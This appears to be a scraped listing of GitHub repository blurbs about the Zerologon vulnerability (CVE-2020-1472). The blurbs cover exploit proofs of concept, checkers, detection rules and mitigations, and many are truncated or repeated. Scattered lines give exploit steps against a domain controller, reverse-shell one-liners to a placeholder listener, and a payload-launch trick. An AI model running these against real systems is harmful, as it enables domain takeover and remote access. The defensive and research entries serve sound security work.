CVE-2020-1472

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

Zerologon (CVE-2020-1472) This script is made for bulk checking your domain controllers for the Zerologon vulnerability Note Zerologon vulnerabilities are dangerous for your domain controller, dont use the exploit on production servers Arguments --ip              Ip address for check on CVE-2020-1472 --file

CVE-2020-1472 Checker & Exploit Code for CVE-2020-1472 aka Zerologon Tests whether a domain controller is vulnerable to the Zerologon attack, if vulnerable, it will resets the Domain Controller's account password to an empty string NOTE: It will likely break things in production environments (eg DNS functionality, communication with replication Domain Controller

CVE 2020-1472 Script de validación

CVE-2020-1472 CVE 2020-1472 Script de validación Assumption: WinRM is enabled between domain controllers Required permissions: If child domains are present: Enterprise admin If single forest, single domain: Domain admin This script must be run on a primary domain controller with required permissions It will recursively query all the domain controllers within the Fores

Enumerate AD through LDAP with a collection of helpfull scripts being bundled

ADE - ActiveDirectoryEnum python -m ade usage: ade [-h] [--dc DC] [-o OUT_FILE] [-u USER] [-s] [-smb] [-kp] [-bh] [-spn] [-sysvol] [--all] [--no-creds] [--dry-run] [--exploit EXPLOIT] ___ __ _ ____ _ __ ______ / | _____/ /_(_) _____ / __ \(_)_______ _____/ /_____ _______

A simple implementation/code smash of a bunch of other repos

CVE-2020-1472-Easy This is definitely not something you would want to run on anything that you care about Basically does a zerologon exploit, dumps the hives, extracts the machine password, reinstalls the machine password It seems to work but have not had a lot of time to fully test it Will need the latest impacket to run it Example run /python cve-2020-1472-easymodepy -n

Awesome Systools is a collection of sysadmins daily handy tools.

Awesome Systools Lists The Book of Secret Knowledge Awesome-Selfhosted: This is a list of Free Software network services and web applications which can be hosted locally Selfhosting is the process of locally hosting and managing applications instead of renting from SaaS providers Lucid Index: This site's goal is to help you find the software you need as quickly as possi

PoC for Zerologon (CVE-2020-1472) - Research credits to Tom Tervoort of Secura & exploit credits to dirkjanm

CVE-2020-1472 - Zero-Logon POC This exploit requires you to use the latest impacket from GitHub Ensure impacket installation is done with netlogon structures added Note : By default, successful exploitation changes the password of the DC Account Allows DCSync Breaks communication with other domain controllers (Be careful!) Original Research & information here

第一步 pip3 install -r requirementstxt 查看hash secretsdumppy molecule-labscom/administrator:Aa123456@192168175132 -just-dc-user 'AD$' 攻击 python3 CVE-2020-1472py AD AD$ 192168175132 查询域控hash secretsdumppy molecule-labscom/'AD$'@192168175132 -just-dc-user 'AD$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 恢复hash

Collection of C# projects. Useful for pentesting and redteaming.

RedCsharp Offensive C# tools CasperStager PoC for persisting NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls CSExec An implementation of PSExec in C# CSharpCreateThreadExample C# code to run PIC using CreateThread CSharpScripts Collection of C# scripts CSharpSetThreadContext C# Shellcode Runner to execute

zeroscan / masscanning for Zerologon (CVE-2020-1472) Details in our Blog: Zerologon (CVE-2020-1472) finding and checking

https://github.com/Flangvik/SharpCollection

SharpCollection Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines Is your favorite tool missing? Feel free to open an issue or DM me on twitter @Flangvik Please note that Cobalt Strike's execute-assembly only accepts binaries compiled with the "Any CPU"

Check for events that indicate non compatible devices -> CVE-2020-1472

zerologon Check for events that indicate non compatible devices -> CVE-2020-1472

Common Vulnerability Scoring System (CVSS) Version 3

go-cvss - Common Vulnerability Scoring System (CVSS) Importing CVSS vector and scoring Supoort CVSS version 30 and 31 Exporting CVSS information with template string Sample Code Base Metrics package main import ( "fmt" "os" "githubcom/spiegel-im-spiegel/go-cvss/v3/metric" ) func main() { bm, err := metricNewBase()Deco

Invoke-ZeroLogon This code was heavily adapted from the C# implementation by the NCC Group's Full Spectrum Attack Simulation team and the original CVE published by Secura This script can be run in two modes: When the reset parameter is set to True, the script will attempt to reset the target computer’s password to the default NTLM hash (essentially an empty passwor

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents Batchfile C C# C++ CMake CSS Clojure CoffeeScript Dockerfile Emacs Lisp Go HTML Haskell Inno Setup Java JavaScript Jinja Jupyter Notebook Kotlin Less Lua Makefile Markdown Matlab MoonScript Nim Objective-C Others PHP Perl PowerShell Python Roff Ruby Rust SCSS Scheme Shell TypeScript Vala Vim scr

Invoke-ZeroLogon This code was heavily adapted from the C# implementation by the NCC Group's Full Spectrum Attack Simulation team and the original CVE published by Secura This script can be run in two modes: When the reset parameter is set to True, the script will attempt to reset the target computer’s password to the default NTLM hash (essentially an empty passwor

CFB8 Zero Bytes Attack ❯ python cfb8_zero_bytes_attackpy [!] Attack Success Number of trials: 275 Key: b'U\x1e\x9eoKd\x18\xdf\x0c\x05\xfc3\x1f4\xd9\x8e' IV: b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' Plaintext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Ciphertext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Reference Zerolo

Zerologon Exploit | CVE-2020-1472

Zerologon Checker & Exploit Code for CVE-2020-1472 Tests whether a domain controller is vulnerable to the Zerologon attack, if vulnerable, it will resets the Domain Controller's account password to an empty string

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

Patch and enforcement key assessment for CVE 2020-1472

ZeroLogonAssess Patch and enforcement key assessment for CVE 2020-1472

Command line interface for Kenna API

A CLI for Kenna Platform Command line interface for Kenna API This application is created for the one who wants to get quick informaiton from Kenna platform The Kenna Modules Implemented with The API Vulnerabilities Assets Asset Tagging Asset Groups Asset group reporting Connectors Connector Runs Users Roles Fixes Applications Application Reporting Dashboard Gro

CVE-2020-1472 - Zero Logon vulnerability Python implementation

CVE-2020-1472 CVE-2020-1472 - Zero Logon vulnerability Python implementation

Netlogon Elevation of Privilege Vulnerability | NOPE its a bot

CVE-2020-1472- Netlogon Elevation of Privilege Vulnerability | NOPE its a bot Its a educational bot net use it at your own risk!

C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon

ZeroLogonChecker C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon

Pentest-Tools-Collection Active Directory WinPwn: githubcom/S3cur3Th1sSh1t/WinPwn Bloodhound: githubcom/BloodHoundAD/BloodHound impacket: githubcom/SecureAuthCorp/impacket ADRecon: githubcom/sense-of-security/ADRecon Ghostpack: githubcom/GhostPack OWA / EWS / O365 Mailsniper: githubcom/dafthack/MailSniper ExchangeRelayX: htt

zerologon script to exploit CVE-2020-1472 CVSS 10/10

zerologon zerologon script to exploit CVE-2020-1472 CVSS 10/10 Exploit code based on wwwsecuracom/blog/zero-logon and githubcom/SecuraBV/CVE-2020-1472 Original research and scanner by Secura, modifications by RiskSense Inc githubcom/risksense/zerologon To exploit, clear out any previous Impacket installs you have and install Impacket from g

内网渗透相关总结

Hack_For_Intranet 0x01 信息收集 1常见信息收集命令 #ipconfig: ipconfig /all ------> 查询本机 IP 段，所在域等 #net: net user ------> 本机用户列表 net localgroup administrators ------> 本机管理员[通常含有域用户] net user /domain ------> 查询域用户 net group /domain ------> 查询域里面的工作�

MonitorZeroLogon KQL and PowerShell script to help in monitoring event IDs related to changes in Netlogon secure channel connections associated with CVE-2020-1472

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! Link to the original research wwwsecuracom/blog/zero-logon) Installing Only

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

cve-2020-1472 复现利用及其exp

CVE-2020-1472 POC mac环境下通过proxychains代理的方式在window域环境中复现该漏洞。 Environment DC(主域控制器): Domain User(域成员主机): 通过gost直接设置socks5正向代理。 Attack Hacker(攻击机): 设置proxychains4 vim /Users/xq17/proxychains/proxychainsconf 增加PrxoyList列表 [ProxyList] socks5 102115542 8099 Attack Tools(�

https://github.com/dirkjanm/CVE-2020-1472

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)

[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon) The attack described here takes advantage of flaws in a cryptographic authentication protocol (insecure use of AES-CFB8) that proves the authenticity and identity of a domain-joined computer to the Domain Controller (DC) Due to incorrect use of an AES mode of operation it is possible to sp

内网渗透 隧道、代理、端口转发 代理与端口转发 proxychains 只支持TCP，不支持UDP和ICMP等 与nmap使用的时候，会出现问题。需要在配置文件中，注释掉proxy_dns windows端：githubcom/shunf4/proxychains-windowsgit proxifier 适用windows Venom githubcom/Dliv3/Venom IOX 下载链接：githubcom/EddieIvan01/i

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

Zerologon Summary A Zeek detection package for CVE-2020-1472, also known as Zerologon, which is a CVSS 100 privilege escalation vulnerability against the Netlogon protocol for Windows Server domain controllers Notices By default, both notices are raised: Zerologon_Attempt indicates the requisite number of login attempts were made within a short period of time Zerologon_Pass

Static standalone binaries for Windows and Linux (both x64) of dirkjanm's CVE-2020-1472 POC Python scripts

ZeroLogon - dirkjanm CVE-2020-1472 static binaries Description This repository contains static standalone binaries for Windows and Linux (both x64) of dirkjanm's CVE-2020-1472 POC Python scripts: cve-2020-1472-exploitexe and restorepasswordexe All credit goes to Tom Tervoort for the original research and Dirk-jan Mollema for the Python scripts The build process is heav

Windows-Internal Notes

Windows-Internal Windows-Internal Notes Microsoft Active Direcotry NetLogon Elevation of privilege CVE-2020-1472 Impact: Recent version of Windows Server acting as Active Directory Domani Controllers (DCs) Impact: NetLogon Remote Procedure (MS-NRPC) NetLogon used within Active Directory deployments for authentication of users and machines NetLogoin is leverage by Microsoft

Exploit Code for CVE-2020-1472 aka Zerologon

CVE-2020-1472 Exploit Code for CVE-2020-1472 aka Zerologon

CVE-2020-1472复现时使用的py文件整理打包

CVE-2020-1472 CVE-2020-1472复现时使用的py文件整理打包

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when succesfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will gi

Zerologon Exploit Script This script is used to test and exploit unpatched Domain Controllers for the Zerologon Vulnerability (CVE-2020-1472) More information on this vulnerability can by found here: wwwsecuracom/blog/zero-logon The PoC code for detection was provided by SecuraBV and can be found here: githubcom/SecuraBV/CVE-2020-1472 The exploit code has be

CVE-2020-1472

CVE-2020-1472 CVE-2020-1472 exploit来源: githubcom/dirkjanm/CVE-2020-1472 githubcom/SecuraBV/CVE-2020-1472

Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472. Monitors event ID's 5827, 5828 & 5829. See: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

zabbix-template-CVE-2020-1472 Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 Monitors event ID's 5827, 5828 & 5829 portalmsrcmicrosoftcom/en-US/security-guidance/advisory/CVE-2020-1472

Test script for CVE-2020-1472 for both RPC/TCP and RPC/SMB

Zerologon test for SMB & RPC A python script based on SecuraBV script Demonstrates that CVE-2020-1472 can be done via RPC/SMB, and not only over RPC/TCP Additionaly, there is a random byte in the final client challange & client credential - to test against trivial IDS signatures The RPC/SMB scan runs by default Depending on the target server, some may requir

Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.

SharpCollection Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines Is your favorite tool missing? Feel free to open an issue or DM me on twitter @Flangvik Azure DevOps? Each night at 03:00 AM, the Azure DevOps pipeline checks for new commits to all repositories master

Post-compromise AD password reset

Post-compromise AD password reset Notes copied from us-certcisagov/ncas/alerts/aa20-283a If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be

Zerologon Check and Exploit - Discovered by Tom Tervoort of Secura and expanded on @dirkjanm's cve-2020-1472 coded example

CVE-2020-1472 aka Zerologon Exploit POC What is it? NetLogon (MS-NRPC), can establish inter-domain control vulnerable security channel It's possible to zero out the password for the machine account on domain controllers Notes: DC will be semi broken while password is zero'ed out Could cause DNS issues with DC (fixed with reboot) Kerberos Tickets have a 10 hour lif

Notes Taken for HTB Machine

hackthebox Notes Taken for HTB Machine Will be periodiclly updated, created with the intend of unwraping all possible ways and to prep for exams created & maintained by: cyberwr3nch Contents Command Reference Tools Bloggers Commands Reference File Contents Active Directory Bruteforce SMB, Winrm Bruteforce, AD User Enumeration, Mounting Disks, BloodHound, rpcc

SharpCollection Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines Is your favorite tool missing? Feel free to open an issue or DM me on twitter @Flangvik Please note that Cobalt Strike's execute-assembly only accepts binaries compiled with the "Any CPU"

Automate installation of extra pentest tools on Kali Linux

WeaponizeKalish is a Bash script aimed at automating the process of downloading and installing extra tools for internal penetration tests with Kali Linux Basic principles behind this project are: Use bleeding-edge versions of offensive toolkits to possess their latest features and fixes When installing 3rd party software, use isolated environments to minimize potential depe

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

Script to automate Checks for potential exploitation of CVE-2020-1472 (aka ZeroLogon) in the domain This is a very "quick and dirty" script that automates some of the leading artifects in determining an actual exploitation of CVE-2020-1472, compiled from multiple blogs Ideally, the 2nd check (for events from Security & System event logs) can be done from a S

C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon

ZeroLogonChecker C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon

CVE [+] CVE-2020-1472 | Windows Server Netlogon vul

CFB8 Zero IV Attack ❯ python cfb8_zero_iv_attackpy [!] Attack Success Number of trials: 275 Key: b'U\x1e\x9eoKd\x18\xdf\x0c\x05\xfc3\x1f4\xd9\x8e' IV: b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' Plaintext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Ciphertext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Reference Zerologon: U

Test tool for CVE-2020-1472

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when succesfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will gi

Ladon Moudle CVE-2020-1472 Exploit

CVE-2020-1472-EXP Ladon Moudle CVE-2020-1472 Exploit

CVE-2020-1472漏洞复现过程

CVE-2020-1472 CVE-2020-1472漏洞复现过程 过程详见：blogcsdnnet/mukami0621/article/details/108605941

Zer0Dump Zer0dump is an PoC exploit/tool for abusing the vulnerabilities associated with CVE-2020-1472 (Zerologon) in order to initiate a full system takeover of an unpatched Windows domain controller Special thanks to @dirkjanm and @SecureAuthCorp

ZeroLogon - Exploit and Example Modified the test PoC from Secura, CVE-2020-1472, in order to change the machine's password to null Changing password on the machine uses Microsoft's NetrServerPasswordSet2() function This exploit takes advantage of Impacket's nrpcpy module to call NetrServerPasswordSet2() Run the exploit /zerologon_NULLPASSpy <dc-name

Zerologon Exploit Code for CVE-2020-1472 aka Zerologon

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

Zeek package to detect Zerologon

Zerologon Summary A Zeek detection package for CVE-2020-1472, also known as Zerologon, which is a CVSS 100 privilege escalation vulnerability against the Netlogon protocol for Windows Server domain controllers Notices By default, both notices are raised: Zerologon_Attempt indicates the requisite number of login attempts were made within a short period of time Zerologon_Pass

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when succesfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will gi

Reworked version of NCC Group's [SharpZeroLogon](https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon) for .NET Framework 3.5

SharpZeroLogon This is an exploit for CVE-2020-1472, aka Zerologon This tool exploits a cryptographic vulnerability in Netlogon to achieve authentication bypass Ultimately, this allows for an attacker to reset the machine account of a target Domain Controller, leading to Domain Admin compromise The vulnerability was discovered by Tom Tervoort of Secura BV, and was address

ZeroLogon - Exploit and Example Modified the test PoC from Secura, CVE-2020-1472, in order to change the machine's password to null Changing password on the machine uses Microsoft's NetrServerPasswordSet2() function This exploit takes advantage of Impacket's nrpcpy module to call NetrServerPasswordSet2() Run the exploit /zerologon_NULLPASSpy <dc-name

内网渗透工具

caoIntranet 内网渗透工具 ├─信息收集 │ ├─goby-win-x64-16154 │ │ ├─config │ │ │ └─langs │ │ ├─data │ │ │ ├─logs │ │ │ ├─result │ │ │ ├─task │ │ │ └─tmp │ │ ├─golib │ │ │ ├─exploits │ │ │ │ ├─system │ │ │ │ └─user │ �

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

Windows NetLogon 权限提升漏洞复现（CVE-2020-1472） 需将impacketzip解压到当前文件夹 具体过程可参考文章：mpweixinqqcom/s/8rp0k5M2aPSPIXxVuIRMdQ 参考 githubcom/dirkjanm/CVE-2020-1472 githubcom/sv3nbeast/CVE-2020-1472

Protect your domain controllers against Zerologon (CVE-2020-1472).

Set-ZerologonMitigation Protect your domain controllers against Zerologon (CVE-2020-1472)

Github Actions Rss (garss, 嘎RSS! 已收集101个RSS源, 生成时间: 2021-04-07 01:44:29) 信息茧房是指人们关注的信息领域会习惯性地被自己的兴趣所引导，从而将自己的生活桎梏于像蚕茧一般的“茧房”中的现象。 《嘎!RSS》为打破信息茧房而生 这个名为嘎!RSS的项目会利用免费的Github Actions服务, �

Microsoft 365 Defender - Resource Hub

Microsoft 365 Defender - Resource Hub Welcome to the Microsoft 365 Defender Resource Hub Update! as the list of Microsoft 365 Defender resources keeps growing I am highlighting additions Become a Microsoft Defender ATP Ninja Security Community Webinars On-demand webcast series: “Tracking the adversary” Microsoft 365 Security for IT Pros A must have

Automate installation of extra pentest tools on Kali Linux

WeaponizeKalish is a Bash script aimed at automating the process of downloading and installing extra tools for internal penetration tests on Kali Linux Basic principles behind this project are: Use bleeding-edge versions of offensive toolkits to possess their latest features and fixes When installing 3rd party software, use isolated environments to minimize potential depend

Hunting-Active-Directory 个人整理的一些域渗透Tricks，可能有一些错误。 信息收集 常用命令 Net use Net view Tasklist /v Ipconfig /all net group /domain 获得所有域用户组列表 net group "domain admins" /domain 获得域管理员列表 net group "enterprise admins" /domain 获得企业管理员列表 net localgroup administra

Awesome CSIRT is an curated list of links and resources in security and CSIRT daily activities.

CSIRT *Please contribute through pull requests- ;) Another great list: awesome-incident-response Books Nice list here by CertBR Practical Cryptography for Developers, github The Book of Secret Knowledge Security Engineering — Third Edition The Cyber Plumber's Handbook Links FIRST CertBR - useful links 7º Fórum Brasileiro de CSIRTs 9º Fó

Purple Team - Set of techniques, tools and ideas related to Red & Blue Teams twittercom/MrUn1k0d3r/status/1143928885211537408?s=08 Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current Then %userprofile%\AppData\Local\Microsoft\Teams\Updateexe --processStart payloadexe --process-start-args "whatever args" githubcom/foi-

2020年网上阅读过的文章记录

渗透 Seagate Central Storage远程执行代码0天 NSA固件漏洞挖掘 SKF实验室 GraphQL错误，JWT，SSRF，SSTI漏洞环境,可以和githubcom/D0g3-Lab/H1ve漏洞环境结合一起使用 hydra使用 新用法、结合tor代理破解密码 通过滥用文件下载功能中的SQL注入来窃取NTLMv2哈希 通过注入获取NTLMv2 hash值 持久性&nd

Powershell tool to automate Active Directory enumeration.

adPEAS adPEAS is a Powershell tool to automate Active Directory enumeration In fact, adPEAS is like a wrapper for different other cool projects like PowerView Empire Bloodhound and some own written lines of code As said, adPEAS is a wrapper for other tools They are almost all written in pure Powershell but some of them are included as compressed binary blob or C# code How

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

Compiled binaries and ready code for Red Teaming

Red Team Binaries Compiled binaries and ready to use code for red teaming *References: githubcom/GhostPack githubcom/rootm0s/WinPwnage githubcom/0xbadjuju/WheresMyImplant githubcom/hfiref0x/UACME githubcom/RhinoSecurityLabs/Aggressor-Scripts pentestmagcom/simpleshellcodeinjector-ssi/ Exploits krbtgtpw/dacl-permis

Pentester's Promiscuous Notebook. Use your Ctrl-F to navigate around

snovvcrash’s Security Blog TOC {:toc} Reverse Shells securixykz/hack-faq/reverse-shell-ili-bjekkonnekthtml/ Bash root@kali:$ bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 root@kali:$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f Net

Active Directory Kill Chain Attack & Defense Summary This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention And understand Active Directory Kill Chain Attack and Mo

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

Active Directory Kill Chain Attack & Defense Summary This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention And understand Active Directory Kill Chain Attack and Mo

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

CVEs enumerated by FireEye and that should be addressed to limit the effectiveness of leaked the Red Team tools CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 100 CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 100 CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

vFeed CVEs Vulnerability Indicators that should be addressed to limit the effectiveness of the Leaked FireEye Red Team tools CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 100 CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 100 CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Forti

PENTESTING-BIBLE Explore more than 2000 hacking articles saved over time as PDF BROWSE HISTORY Created By Ammar Amer (Twitter @cry__pto) Support Paypal: -1- 3 Ways Extract Password Hashes from NTDSdit: wwwhackingarticlesin/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: wwwhackingarticlesin/3-ways-to-captu

Awesome Hacking Awesome hacking is a curated list of hacking tools for hackers, pentesters and security researchers Its goal is to collect, classify and make awesome tools easy to find by humans, creating a toolset you can checkout and update with one command This is not only a curated list, it is also a complete and updated toolset you can download with one-command! You can

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

2020年发布到阿尔法实验室微信公众号的所有安全资讯汇总

欢迎关注阿尔法实验室微信公众号 20201231 [漏洞] 2020年增加的10个最严重的CVE blogdetectifycom/2020/12/30/top-10-critical-cves-added-in-2020/ Chromium RawClipboardHostImpl中的UAF漏洞 bugschromiumorg/p/chromium/issues/detail?id=1101509 [工具] Sarenka：OSINT工具，将来自shodan、censys等服务的数据集中在一处�